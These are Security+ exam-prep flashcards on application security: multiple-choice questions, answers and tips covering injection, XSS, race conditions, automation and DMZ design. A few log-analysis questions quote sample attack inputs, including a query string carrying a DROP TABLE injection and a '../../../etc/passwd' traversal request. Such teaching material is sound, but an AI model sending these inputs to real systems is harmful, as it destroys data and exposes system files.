Ch.6 Application Security Flashcards
Adam is conducting software testing by reviewing the source code of the application. What type of code testing is Adam conducting?
A. Mutation testing
B. Static code analysis
C. Dynamic code analysis
D. Fuzzing
✅ B. Static code analysis – This method reviews the application’s source code without executing it to detect potential vulnerabilities.
❌ A. Mutation testing – Tests the effectiveness of test cases by intentionally altering code.
❌ C. Dynamic code analysis – Involves executing the application.
❌ D. Fuzzing – Sends random or invalid data to the application to uncover flaws.
💡 Security+ Tip:
If the question mentions code review without execution, it’s referring to static code analysis. If the code is running during the test, it’s dynamic.
Charles is worried about users conducting SQL injection attacks. Which of the following solutions will best address his concerns?
A. Using secure session management
B. Enabling logging on the database
C. Performing user input validation
D. Implementing TLS
✅ C. Performing user input validation – This ensures user-supplied data is clean and prevents malicious SQL statements from being executed.
❌ A. Using secure session management – Helps protect sessions, not SQL queries.
❌ B. Enabling logging on the database – Useful for detection, but not prevention.
❌ D. Implementing TLS – Encrypts data in transit but doesn’t protect against injections.
💡 Security+ Tip:
SQL injection prevention almost always points to input validation or parameterized queries. Look for phrases like user input or malformed SQL.
Precompiled SQL statements that only require variables to be input are an example of what type of application security control?
A. Parameterized queries
B. Encoding data
C. Input validation
D. Appropriate access controls
✅ A. Parameterized queries – These separate SQL code from user input, preventing injection attacks.
❌ B. Encoding data – Useful for XSS, not SQL injection.
❌ C. Input validation – Validates input but doesn’t structure the query like parameterization does.
❌ D. Appropriate access controls – Manages user privileges, not query structure.
💡 Security+ Tip:
When the question mentions precompiled statements or separating input from SQL, the answer is almost always parameterized queries.
During a web application test, Ben discovers that the application shows SQL code as part of an error provided to application users. What should he note in his report?
A. Improper error handling
B. Code exposure
C. SQL injection
D. A default configuration issue
✅ A. Improper error handling – Revealing internal code or SQL errors to users is a security risk and poor coding practice.
❌ B. Code exposure – Not a standard term for this specific issue.
❌ C. SQL injection – Could be the result, but the behavior itself is due to error handling, not the injection.
❌ D. A default configuration issue – This is too vague and not specific to error messages.
💡 Security+ Tip:
If the system reveals technical details or internal code in error messages, it’s usually a question about improper error handling.
The application that Scott is writing has a flaw that occurs when two operations are attempted at the same time, resulting in unexpected results when the two actions do not occur in the expected order. What type of flaw does the application have?
A. Dereferencing
B. A race condition
C. An insecure function
D. Improper error handling
✅ B. A race condition – This happens when the timing or order of operations affects the result, creating a security flaw.
❌ A. Dereferencing – Refers to using a pointer incorrectly, not timing.
❌ C. An insecure function – Not a specific or accurate match.
❌ D. Improper error handling – Involves revealing sensitive info, not timing.
💡 Security+ Tip:
If the question mentions issues with timing or sequence of events, especially with concurrent operations, think race condition.
Every time Susan checks code into her organization’s code repository, it is tested and validated, and then if accepted, it is immediately put into production. What is the term for this?
A. Continuous integration
B. Continuous delivery
C. A security nightmare
D. Agile development
✅ B. Continuous delivery – Refers to automated build, test, and release processes that push validated code into production.
❌ A. Continuous integration – Only includes building and testing, not deployment.
❌ C. A security nightmare – Not a real term.
❌ D. Agile development – A methodology, not a deployment process.
💡 Security+ Tip:
If code is automatically deployed to production after testing, it’s continuous delivery. If it stops at testing, it’s continuous integration.
Tim is working on a change to a web application used by his organization to fix a known bug. What environment should he be working in?
A. Test
B. Development
C. Staging
D. Production
✅ B. Development – This is where code is written and modified before it’s tested or staged.
❌ A. Test – Used after development to validate functionality.
❌ C. Staging – Mimics production for final checks.
❌ D. Production – Live environment; changes shouldn’t be made directly here.
💡 Security+ Tip:
If the question involves coding or bug fixing, the correct environment is usually development.
Ricky is concerned that developers in his organization make use of third-party code in their applications, which may introduce unknown vulnerabilities. He is concerned about the risk of the organization running code that it is not aware it is using. Which one of the following activities would best address this risk?
A. Web application firewalls
B. Package monitoring
C. Static analysis
D. Dynamic analysis
✅ B. Package monitoring – Tracks and monitors third-party libraries and dependencies for vulnerabilities or unauthorized changes.
❌ A. Web application firewalls – Protect against web attacks, not third-party code usage.
❌ C. Static analysis – Reviews code for flaws but doesn’t monitor external packages.
❌ D. Dynamic analysis – Tests running code, but doesn’t track package sources.
💡 Security+ Tip:
If the concern is third-party or hidden libraries, the answer is package monitoring — it helps detect and manage software supply chain risks.
Which one of the following is not an advantage of automation in cybersecurity operations?
A. Enforcing baselines
B. Technical debt
C. Employee retention
D. Standardizing infrastructure configurations
✅ B. Technical debt – This is a risk, not a benefit. It refers to outdated or unmaintained automation scripts causing long-term problems.
❌ A. Enforcing baselines – A benefit of automation.
❌ C. Employee retention – Automation helps reduce burnout.
❌ D. Standardizing infrastructure configurations – Another automation advantage.
💡 Security+ Tip:
If the answer is something negative or requiring long-term maintenance, it’s likely part of “Other Considerations”, not a benefit.
Chris is creating a script that will automatically screen any user requests and flag those that exceed normal thresholds for manual review. What term best describes this automation use case?
A. User provisioning
B. Guard rails
C. Ticket creation
D. Escalation
✅ B. Guard rails – Guard rails are policy-enforcing scripts that prevent misconfigurations, violations, or abnormal activity.
❌ A. User provisioning – Refers to account and access automation.
❌ C. Ticket creation – Creates incidents or support tickets.
❌ D. Escalation – Notifies higher levels when issues need urgent attention.
💡 Security+ Tip:
If the question involves enforcing rules or preventing actions, think guard rails. If it involves creating accounts or tickets, that’s a different use case.
Which one of the following is not a common drawback of automating cybersecurity operations?
A. Reducing employee satisfaction
B. Creating single points of failure
C. Costs
D. Complexity
✅ A. Reducing employee satisfaction – This is not a known drawback of automation. In fact, automation often improves satisfaction by removing repetitive tasks.
❌ B. Creating single points of failure – A valid risk if automation isn’t properly designed.
❌ C. Costs – Automation may involve high upfront investment.
❌ D. Complexity – Developing and managing automation requires technical skill.
💡 Security+ Tip:
Watch for answers that sound plausible but aren’t in the official list. Reducing employee satisfaction is not listed as a common automation drawback on the exam.
Frank is investigating a security incident where the attacker entered a very long string into an input field, which was followed by a system command. What type of attack likely took place?
A. Cross-site request forgery
B. Server-side request forgery
C. Command injection
D. Buffer overflow
✅ D. Buffer overflow – The attacker overfilled memory buffers and executed additional code (like a system command).
❌ A. Cross-site request forgery – Tricks a user into making an unintended request.
❌ B. Server-side request forgery – Forces a server to make a request on the attacker’s behalf.
❌ C. Command injection – Involves submitting OS commands, but not necessarily via buffer manipulation.
💡 Security+ Tip:
If the scenario mentions excessive input size and memory manipulation, it’s most likely a buffer overflow.
What type of attack places an attacker in the position to eavesdrop on communications between a user and a web server?
A. On-path attack
B. Session hijacking
C. Buffer overflow
D. Meet-in-the-middle
✅ A. On-path attack – Formerly known as man-in-the-middle, this attack lets the adversary intercept, alter, or observe communications between two systems.
❌ B. Session hijacking – Focuses on stealing session tokens, not necessarily listening in.
❌ C. Buffer overflow – A memory attack, unrelated to network traffic.
❌ D. Meet-in-the-middle – A cryptographic attack targeting encryption processes, not eavesdropping.
💡 Security+ Tip:
If the attacker intercepts or relays communication between two parties, the exam is pointing to an on-path (MITM) attack.
Tom is a software developer who creates code for sale to the public. He would like to assure his users that the code they receive actually came from him. What technique can he use to best provide this assurance?
A. Code signing
B. Code endorsement
C. Code encryption
D. Code obfuscation
✅ A. Code signing – Uses digital signatures to verify authenticity and integrity of code from a trusted source.
❌ B. Code endorsement – Not a real cryptographic term.
❌ C. Code encryption – Hides content but doesn’t prove origin.
❌ D. Code obfuscation – Makes code harder to reverse-engineer but doesn’t validate authorship.
💡 Security+ Tip:
If the question mentions verifying authorship or preventing tampered code, think code signing
Chris is reviewing evidence of a cross-site scripting attack where the attacker embedded JavaScript in a URL that a user clicked. The web page then sent the JavaScript to the user in the displayed page. What term best describes this attack?
A. Reflected XSS
B. Stored XSS
C. Persistent XSS
D. DOM-based XSS
✅ A. Reflected XSS – Occurs when the malicious script is reflected off a web server, typically via a URL, and sent back in the immediate response.
❌ B. Stored XSS – The malicious code is saved on the server and shown to multiple users.
❌ C. Persistent XSS – Another name for stored XSS.
❌ D. DOM-based XSS – The payload is executed purely in the browser via DOM manipulation.
💡 Security+ Tip:
If the script is delivered via a URL or link and not stored, it’s reflected XSS. Stored = persistent = saved on server.
Joe checks his web server logs and sees that someone sent the following query string to an application running on the server:
www.mycompany.com/servicestatus.php?serviceID=892&serviceID=892’%20;DROP%20TABLE%20Services;–
What type of attack was most likely attempted?
A. Cross-site scripting
B. Session hijacking
C. Parameter pollution
D. On-path
✅ C. Parameter pollution – This attack passes duplicate or manipulated parameters to confuse the application or inject malicious code.
❌ A. Cross-site scripting – Targets browsers, not databases.
❌ B. Session hijacking – Involves stealing a session ID.
❌ D. On-path – Involves traffic interception, not query manipulation.
💡 Security+ Tip:
If multiple values are passed for the same parameter (e.g., serviceID=892&serviceID=892’), think parameter pollution.
Upon further inspection, Joe finds a series of thousands of requests to the same URL coming from a single IP address. Here are a few examples:
www.mycompany.com/servicestatus.php?serviceID=1
www.mycompany.com/servicestatus.php?serviceID=2
www.mycompany.com/servicestatus.php?serviceID=3
What type of vulnerability was the attacker likely trying to exploit?
A. Insecure direct object reference
B. File upload
C. Unvalidated redirect
D. Session hijacking
✅ A. Insecure direct object reference – The attacker is enumerating resource IDs to gain unauthorized access to data via predictable URLs.
❌ B. File upload – Irrelevant to what the logs show.
❌ C. Unvalidated redirect – Involves redirecting users to malicious sites.
❌ D. Session hijacking – No evidence of session token theft.
💡 Security+ Tip:
If you see someone guessing or brute-forcing object IDs in a URL (like ?id=1 to ?id=9999), it’s likely an IDOR attack.
Joe’s adventures in web server log analysis are not yet complete. As he continues to review the logs, he finds the request:
www.mycompany.com/../../../etc/passwd
What type of attack was most likely attempted?
A. SQL injection
B. Session hijacking
C. Directory traversal
D. File upload
✅ C. Directory traversal – The attacker is trying to navigate outside the intended directory structure to access sensitive files.
❌ A. SQL injection – Targets databases, not file paths.
❌ B. Session hijacking – Not related to file access.
❌ D. File upload – No uploading is shown here.
💡 Security+ Tip:
Look for patterns like ../ or ..\ — they indicate directory traversal, especially if targeting files like /etc/passwd.
Wendy is a penetration tester who wishes to engage in a session hijacking attack. What information is crucial for Wendy to obtain if her attack will be successful?
A. Session ticket
B. Session cookie
C. Username
D. User password
✅ B. Session cookie – This identifies the user’s session and is required to hijack it.
❌ A. Session ticket – A generic term; not typically used in hijacking.
❌ C. Username – Useful, but not enough to hijack a session.
❌ D. User password – That would be credential theft, not session hijacking.
💡 Security+ Tip:
If the attack involves taking over an active session, the attacker needs the session cookie/token.
Joe is examining the logs for his web server and discovers that a user sent input to a web application that contained the string WAITFOR. What type of attack was the user likely attempting?
A. Timing-based SQL injection
B. HTML injection
C. Cross-site scripting
D. Content-based SQL injection
✅ A. Timing-based SQL injection – The keyword WAITFOR is used to delay SQL execution, often to test for SQL injection vulnerabilities.
❌ B. HTML injection – This targets rendered web pages, not databases.
❌ C. Cross-site scripting – Involves JavaScript or HTML, not SQL commands.
❌ D. Content-based SQL injection – Relies on differences in error or content, not timing delays.
💡 Security+ Tip:
If you see keywords like WAITFOR, SLEEP(), or response delays, it’s a timing-based SQL injection attack.
Explain difference between Static and Dynamic testing in Application Security
Static Testing analyzes code without executing it.
- It identifies vulnerabilities directly in the code.
- Often provides specific remediation suggestions to developers.
Dynamic Testing analyzes code while it is running.
- It tests all user-exposed interfaces with various inputs.
- Searches for vulnerabilities during execution.
A security team is reviewing a newly developed application. To identify vulnerabilities before the code is executed, they choose a method that scans the source code and provides developers with direct feedback and remediation suggestions.
Which of the following BEST describes this type of testing?
A. Fuzz testing
B. Static analysis
C. Dynamic analysis
D. Penetration testing
✅ Correct Answer: B. Static analysis
Explanation:
Static analysis examines application source code without executing it. It’s used during the development phase to identify security vulnerabilities such as hardcoded credentials, unsafe function calls, or logic errors. This approach provides specific remediation guidance and allows developers to fix issues early in the software development lifecycle (SDLC).
❌ Incorrect Answers:
A. Fuzz testing – This is a type of dynamic testing that sends random or malformed input to an application to find vulnerabilities like crashes or buffer overflows. It requires code execution.
C. Dynamic analysis – This analyzes the application while it is running, interacting with its interfaces. It helps uncover vulnerabilities that might not be visible through static methods, such as authentication issues or logic flaws that occur during execution.
D. Penetration testing – This simulates real-world attacks to exploit vulnerabilities. It’s typically conducted after deployment, not during the development/testing phase, and is broader than static or dynamic analysis.
A web application security analyst is investigating a report from a user who clicked on a blog comment and was immediately redirected to a fake login page that mimicked the company’s portal. The user had not installed any browser extensions, and the site is hosted on the company’s internal web server.
Which of the following is the MOST likely explanation for what occurred?
A. The attacker used a cross-site request forgery (CSRF) attack to trick the server into executing unauthorized commands.
B. The attacker exploited a buffer overflow vulnerability in the browser to gain remote code execution.
C. The attacker performed a SQL injection attack to retrieve stored login credentials.
D. The attacker performed a cross-site scripting attack to inject client-side code into the website.
✅ Correct Answer: D. The attacker performed a cross-site scripting attack to inject client-side code into the website.
Explanation:
This describes a stored XSS attack, where the attacker embedded malicious code (e.g., a redirect) into the blog comment field. When the unsuspecting user viewed the page, their browser executed the injected code, redirecting them to a fake login page. The attack relies on tricking the user into executing code from a trusted site, which fits the definition from your Exam Note.
❌ Incorrect Answers:
A. CSRF – Forces a logged-in user’s browser to make unwanted requests. It’s about exploiting trust between browser and server, not executing code in the browser.
B. Buffer overflow – This affects memory and system stability, often used for remote code execution, but not likely triggered by clicking a blog comment.
C. SQL injection – Targets the database, not the browser. It retrieves or manipulates data, not execute client-side redirects.
💡 Security+ Tip:
If the question involves malicious code executing in the user’s browser after visiting a legitimate site, think XSS. Even if the question doesn’t show code, focus on behavior like redirects, pop-ups, or data exfiltration happening on the client side.
A developer is updating a customer-facing web application after a penetration test revealed that users could inject JavaScript into form fields and manipulate SQL queries using specially crafted input.
Which of the following would BEST help mitigate both types of attacks?
A. Implementing output encoding for web responses
B. Enforcing strong password policies
C. Performing input validation on all user-supplied data
D. Using HTTPS to encrypt traffic between clients and servers
✅ Correct Answer: C. Performing input validation on all user-supplied data
Explanation:
Input validation ensures that data entered by users conforms to expected formats and rejects malicious input such as embedded JavaScript (for XSS) or SQL syntax (for SQL injection). It is a core defense mechanism that protects against a wide range of input-based attacks.
❌ Incorrect Answers:
A. Output encoding – Helps mitigate XSS, but does not address SQL injection.
B. Strong password policies – Improve account security but don’t prevent injection attacks.
D. HTTPS encryption – Protects data in transit, but doesn’t validate or sanitize user input.
💡 Security+ Tip:
If a question asks how to defend against XSS and SQL injection, always think input validation. It’s one of the most fundamental and universal defenses against input-based web attacks.
A web developer is designing a form for users to submit feedback on a company website. The developer adds JavaScript code to display real-time error messages when users leave required fields blank or exceed character limits. However, during a security assessment, a tester was able to bypass the form’s input checks and submit malicious JavaScript code to the server.
Which of the following BEST explains why the input checks failed to prevent the attack?
A. The form lacked proper encryption when transmitting data.
B. The server failed to use multifactor authentication.
C. The validation was implemented only on the client side.
D. The web server used a self-signed certificate.
✅ Correct Answer: C. The validation was implemented only on the client side.
Explanation:
Client-side validation (e.g., JavaScript input checks) can improve usability but cannot be trusted for security. Attackers can disable or bypass it and submit malicious input directly to the server. Server-side validation is essential for rejecting dangerous input like XSS or SQL injection attempts.
❌ Incorrect Answers:
A. Encryption (HTTPS) – Protects data in transit but doesn’t validate it.
B. Multifactor authentication – Controls access, not input validation.
D. Self-signed certificate – May raise trust issues but doesn’t impact input handling or validation.
💡 Security+ Tip:
If a question describes real-time input checks in the browser that fail to block malicious data, the answer is likely related to client-side validation. Always look for whether the server is properly sanitizing and validating inputs before processing.
A security engineer is designing the network layout for a company that will host multiple public-facing services, including a web server and a DNS server. The company wants to ensure these services are isolated from the internal network and that if one service is compromised, the internal environment remains protected.
The engineer proposes placing the public servers between two firewalls—one controlling traffic from the internet and another controlling access to the internal network.
Which of the following BEST describes this network architecture?
A. Screened subnet
B. Internal segmentation
C. Back-to-back firewall
D. VLAN trunking
✅ Correct Answer: C. Back-to-back firewall
This is a classic back-to-back (dual-firewall) DMZ design. It uses: One firewall between the internet and the DMZ. Another firewall between the DMZ and the internal network
This structure creates physical isolation, allowing better control of inbound and outbound traffic and minimizing exposure if the public-facing system is compromised.
❌ Incorrect Answers:
A. Screened subnet – Uses one firewall with three interfaces (external, DMZ, internal). That’s not what’s described here — this scenario uses two firewalls.
B. Internal segmentation – Refers to isolating internal systems within a network, usually with VLANs or firewalls. It doesn’t involve public-facing servers in a DMZ.
D. VLAN trunking – Involves tagging multiple VLANs on a single physical link, typically between switches. It’s unrelated to DMZ architecture.
💡 Security+ Tip:
If the question mentions two firewalls with a DMZ in between, think “back-to-back firewall”. If it describes a single firewall with three zones, go with “screened subnet”. The key is how many firewalls and how the traffic is segmented.
A security analyst deploys a system that runs unknown files in a restricted virtual environment. The goal is to observe their behavior without allowing access to production systems. During an investigation, the analyst discovers that an attacker was executing malware but was unknowingly confined to this controlled space, preventing damage to the rest of the network.
Which of the following BEST describes the technique used to contain the attacker?
A. Honeynet
B. Containerization
C. Virtual desktop infrastructure (VDI)
D. Sandbox
✅ Correct Answer: D. Sandbox
A sandbox is an isolated environment used to run untrusted code or applications safely. It’s often used for malware analysis or attack containment, where the attacker or malicious software believes it’s in a real environment but is actually restricted. This allows the defender to observe the behavior without risking production systems.
❌ Incorrect Answers:
A. Honeynet – A honeynet is a group of intentionally vulnerable systems used to attract attackers and study their tactics, but it’s not primarily used for containing execution of code like a sandbox.
B. Containerization – Containers isolate applications, but this refers more to application deployment and scalability, not deceptive isolation for attackers.
C. Virtual desktop infrastructure (VDI) – VDI delivers user desktops in virtual form, often for management and security, but it’s not specifically designed to trick attackers or isolate malware.
💡 Security+ Tip:
If a question mentions running untrusted or malicious code in an isolated environment for analysis or containment, think sandbox. If it involves luring attackers, it’s more likely a honeypot or honeynet.
A security analyst is investigating a report that an internally developed application crashes when users submit excessively long input into a feedback form. Upon closer inspection, the analyst discovers that the excessive input causes the program to overwrite adjacent memory locations, resulting in unauthorized code execution.
Which of the following BEST describes this type of vulnerability?
A. Input validation
B. Buffer overflow
C. Memory leak
D. Command injection
✅ Correct Answer: B. Buffer overflow
A buffer overflow occurs when input exceeds the allocated memory space, overwriting adjacent memory. This can lead to crashes, data corruption, or remote code execution, especially when attackers inject and run their own code in memory.
❌ Incorrect Answers:
A. Input validation – This is a mitigation, not the vulnerability itself.
C. Memory leak – A memory leak occurs when memory isn’t released after use, leading to resource exhaustion — not code injection.
D. Command injection – That involves injecting OS commands, not overwriting memory directly.
💡 Security+ Tip:
If the question mentions overwriting memory or excessive input leading to a crash or code execution, it’s almost always a buffer overflow.
A developer reports that a web application incorrectly allows a user to access restricted content immediately after their permissions have been revoked. The system checks the user’s access rights at login, but doesn’t verify access again when content is requested. As a result, users with active sessions may retain access longer than intended.
Which of the following BEST describes this vulnerability?
A. Privilege escalation
B. Session hijacking
C. Time-of-check to time-of-use (TOCTOU)
D. Broken authentication
✅ Correct Answer: C. Time-of-check to time-of-use (TOCTOU)
A TOCTOU race condition occurs when a system checks a condition (like access rights), but uses the result later without rechecking, during which time the condition may have changed. In this case, the user’s access was revoked, but the system never rechecked it before allowing resource access.
❌ Incorrect Answers:
A. Privilege escalation – That’s when a user gains higher access than authorized, not retaining access after revocation.
B. Session hijacking – Involves an attacker stealing a session token, not a timing flaw in access logic.
D. Broken authentication – Refers to flaws in verifying identity, not timing issues after login.
💡 Security+ Tip:
When a question involves access granted due to outdated or unchecked conditions, especially after login, it’s pointing to a TOCTOU race condition.
A developer identifies a vulnerability in a file-processing module used by an internal application. When two users attempt to upload files with the same filename at nearly the same time, the application writes both uploads to the same location. This causes unpredictable results, including one user being able to access or overwrite the other user’s file.
Which of the following BEST describes this type of vulnerability?
A. Race condition
B. Resource exhaustion
C. Broken access control
D. Improper error handling
✅ Correct Answer: A. Race condition
This is a classic race condition, where two actions occur almost simultaneously, and the application’s logic doesn’t properly handle concurrent access to the same file or resource. The order of execution affects the result and causes security and data integrity issues.
❌ Incorrect Answers:
B. Resource exhaustion – That refers to overusing system resources like memory or CPU, not simultaneous access.
C. Broken access control – That would involve unauthorized access due to missing or misconfigured access checks, not timing conflicts.
D. Improper error handling – Refers to exposing sensitive info or failing securely on error — not concurrent access logic.
💡 Security+ Tip:
If the question mentions two users or processes accessing the same resource at once, and the outcome depends on timing, it’s a race condition — even if TOCTOU isn’t specifically mentioned.
What are the 9 Use Cases of Automation and Scripting
1- User Provisioning
Automate adding, modifying, or removing user accounts and permissions.
2 - Resource Provisioning
Automate allocation or deallocation of system resources (e.g., storage, compute).
3 - Guard Rails
Use automation to enforce policies and prevent security violations.
4 - Security Groups
Automate managing group memberships to control access permissions.
5 - Ticket Creation
Automatically generate and route alerts or incidents to the appropriate team.
6 - Escalation
Automate alerting higher-level personnel during serious incidents.
7 - Enabling/Disabling Services and Access
Automate turning services or access on/off based on triggers or conditions.
8 - Continuous Integration and Testing
Automate software build and test processes for faster, more secure deployments.
9 - Integrations and APIs
Automate data sharing between tools and platforms through APIs.
7 Benefits of Automation and Scripting
1 - Efficiency and Time Savings
Reduces manual tasks so teams can focus on higher-level work.
2 - Enforcing Baselines
Ensures consistent application of security policies and configurations.
3 - Standardized Infrastructure Configurations
Automates system setup to reduce errors and misconfigurations.
4 - Scaling in a Secure Manner
Supports rapid infrastructure growth while maintaining security.
5 - Employee Retention
Eliminates repetitive tasks, improving job satisfaction and reducing burnout.
6 - Reduced Reaction Time
Responds faster to incidents through automated alerts and actions.
7 - Workforce Multiplier
Amplifies team capacity by automating repetitive tasks.
5 Other Considerations of Automation and Scripting
1- Complexity
Automation scripts can be hard to build and manage; they require advanced technical skill.
2 - Cost
Initial setup may be expensive due to tools, training, and skilled personnel.
3 - Single Point of Failure
A failed or misconfigured script can disrupt large parts of operations if overly relied on.
4 - Technical Debt
Outdated or neglected scripts can cause inefficiencies and security risks over time.
5 - Ongoing Supportability
Scripts must be regularly maintained to stay effective and compatible with changing systems.
A user visits a malicious site while logged into their banking portal in another tab. The site forces the browser to issue an unauthorized funds transfer using the active session token. What type of attack occurred?
A. Cross-site request forgery (CSRF) – Tricks a logged-in user’s browser into submitting a malicious request.
B. Stored XSS – Attacker script is saved on the server.
C. On-path attack – Intercepts traffic, not browser requests.
D. Directory traversal – File system attack, unrelated to sessions.
✅ A. Cross-site request forgery (CSRF) – Tricks a logged-in user’s browser into submitting a malicious request.
❌ B. Stored XSS – Attacker script is saved on the server.
❌ C. On-path attack – Intercepts traffic, not browser requests.
❌ D. Directory traversal – File system attack, unrelated to sessions.
💡 Security+ Tip:
CSRF involves exploiting a user’s active session without their interaction. Look for authenticated actions sent without consent.
An attacker captures network traffic between a user and a server, then replays the authentication request to gain unauthorized access. What type of attack has occurred?
A. Session hijacking
B. Reflected XSS
C. Replay attack
D. Command injection
✅ C. Replay attack – Reuses captured authentication data to gain access, especially when no session tokens or timestamps are validated.
❌ A. Session hijacking – Involves stealing a session token, not replaying captured data.
❌ B. Reflected XSS – Targets browser execution, not network traffic.
❌ D. Command injection – Attempts to run system-level commands, not replay requests.
💡 Security+ Tip:
If the attacker records and resends legitimate traffic, it’s a replay attack — prevented with timestamps, tokens, and encryption.
A vulnerability allows a low-privileged user to exploit flawed application logic to gain administrative access. What type of attack has occurred?
A. Session hijacking
B. Privilege escalation
C. SQL injection
D. Directory traversal
✅ B. Privilege escalation – The attacker gains higher access than they should have, usually due to poor access controls or application logic flaws.
❌ A. Session hijacking – Doesn’t involve escalating privileges.
❌ C. SQL injection – Could be a method, but not the result.
❌ D. Directory traversal – Gains access to files, not administrative privileges.
💡 Security+ Tip:
If a user moves from limited access to admin or root, it’s privilege escalation. Look for phrases like “low-privileged” or “unauthorized access gained.”
A developer wants to prevent attackers from accessing or tampering with cookies used in a web application. Which of the following techniques should they implement?
A. Stored XSS
B. Buffer overflow
C. Dynamic code analysis
D. Secure cookies
✅ D. Secure cookies – Use the Secure and HttpOnly flags to protect cookies from being exposed or transmitted over insecure channels.
❌ A. Stored XSS – An attack, not a protection.
❌ B. Buffer overflow – Memory attack, unrelated to cookies.
❌ C. Dynamic code analysis – Security testing method, not cookie protection.
💡 Security+ Tip:
If the question mentions protecting cookies, the answer is likely secure cookies — especially if referencing HTTPS or JavaScript restrictions.
A security analyst is analyzing a suspicious file in an isolated, controlled environment to observe its behavior without risking production systems. What technique is being used?
A. Static analysis
B. Secure coding
C. Sandboxing
D. Input validation
✅ C. Sandboxing – Isolates a process or file in a safe environment to observe behavior without affecting real systems.
❌ A. Static analysis – Reviews code without running it.
❌ B. Secure coding – A development practice, not an analysis method.
❌ D. Input validation – Prevents malicious input, unrelated to malware testing.
💡 Security+ Tip:
If a file is executed in an isolated or controlled environment, it’s sandboxing — commonly used for malware analysis or file inspection.
